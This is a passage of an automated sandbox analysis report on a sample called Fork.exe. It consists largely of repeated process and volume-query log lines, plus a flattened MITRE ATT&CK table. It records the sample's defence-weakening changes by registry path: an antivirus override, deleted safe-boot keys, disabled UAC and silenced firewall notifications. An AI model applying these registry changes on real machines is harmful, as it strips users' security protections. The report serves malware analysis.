      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmp, dwm.exe, 0000000B.00000000.1007420954.0000013D2A647000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: dwm.exe, 0000000B.00000000.1007773782.0000013D2AAA0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segoeuib.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Windows\Fonts\segmdl2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior
      Source: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Calculator.exeQueries volume information: C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1906.55.0_x64__8wekyb3d8bbwe\Assets\CalcMDL2.ttf VolumeInformationJump to behavior

      Lowering of HIPS / PFW / Operating System Security Settings

      barindex
      Changes security center settings (notifications, updates, antivirus, firewall)
      Source: C:\Users\user\Desktop\Fork.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center AntiVirusOverrideJump to behavior
      Deletes keys which are related to windows safe boot (disables safe mode boot)
      Source: C:\Users\user\Desktop\Fork.exeRegistry key or value deleted: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot AlternateShellJump to behavior
      Disables UAC (registry)
      Source: C:\Users\user\Desktop\Fork.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUAJump to behavior
      Disables user account control notifications
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security CenterJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Source: C:\Users\user\Desktop\Fork.exeRegistry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\SvcJump to behavior
      Modifies the windows firewall
      Source: C:\Users\user\Desktop\Fork.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile DisableNotificationsJump to behavior
      Modifies the windows firewall notifications settings
      Source: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfileRegistry value created: DisableNotifications 1Jump to behavior

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity Information1
      Scripting      		11
      Replication Through Removable Media      		Windows Management Instrumentation1
      Windows Service      		1
      Windows Service      		1
      Masquerading      		OS Credential Dumping1
      Security Software Discovery      		Remote ServicesData from Local System1
      Non-Standard Port      		Exfiltration Over Other Network Medium1
      Inhibit System Recovery
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      Scripting      		212
      Process Injection      		6
      Disable or Modify Tools      		LSASS Memory2
      Process Discovery      		Remote Desktop ProtocolData from Removable Media1
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAt1
      DLL Side-Loading      		1
      DLL Side-Loading      		21
      Virtualization/Sandbox Evasion      		Security Account Manager21
      Virtualization/Sandbox Evasion      		SMB/Windows Admin SharesData from Network Shared Drive2
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
      Bypass User Account Control      		212
      Process Injection      		NTDS11
      Peripheral Device Discovery      		Distributed Component Object ModelInput Capture12
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
